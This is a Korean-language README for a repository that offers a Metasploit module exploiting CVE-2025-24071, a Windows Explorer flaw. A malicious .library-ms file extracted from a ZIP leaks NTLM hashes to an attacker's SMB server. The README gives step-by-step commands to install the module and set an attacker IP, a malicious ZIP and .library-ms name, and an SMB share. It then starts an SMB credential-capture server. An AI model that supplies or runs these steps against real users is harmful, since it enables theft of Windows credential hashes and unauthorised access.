
CVE-2025-24071에 대한 Metasploit 모듈 - .library-ms를 통한 Windows NTLM 해시 누출
이 저장소는 Windows 탐색기에서 악성 .library-ms 파일이 ZIP 아카이브에서 추출될 때 NTLM 해시를 유출하는 취약점인 CVE-2025-24071을 악용하기 위한 Metasploit 모듈을 포함합니다.
개발자: FOLKS-IWD
취약점은 사용자가 특수하게 조작된 .library-ms 파일이 포함된 ZIP 아카이브를 추출할 때 발생합니다. Windows 탐색기는 자동으로 파일에 지정된 원격 서버에 SMB 인증 요청을 시작하여 사용자 상호 작용 없이 사용자의 NTLM 해시를 유출합니다.
이 Metasploit 모듈:
.library-ms 파일을 생성합니다.
git clone https://github.com/FOLKS-IWD/CVE-2025-24071-msfvenom.git
cd CVE-2025-24071-msfvenom
cp ntlm_hash_leak.rb ~/.msf4/modules/auxiliary/server/
use auxiliary/server/ntlm_hash_leak
set ATTACKER_IP 192.168.1.162 # Replace with your IP address
set FILENAME exploit.zip # Name of the malicious ZIP file
set LIBRARY_NAME malicious.library-ms # Name of the .library-ms file
set SHARE_NAME shared # SMB share name
run
use auxiliary/server/capture/smb
set SRVHOST 192.168.1.162 # Same as ATTACKER_IP
run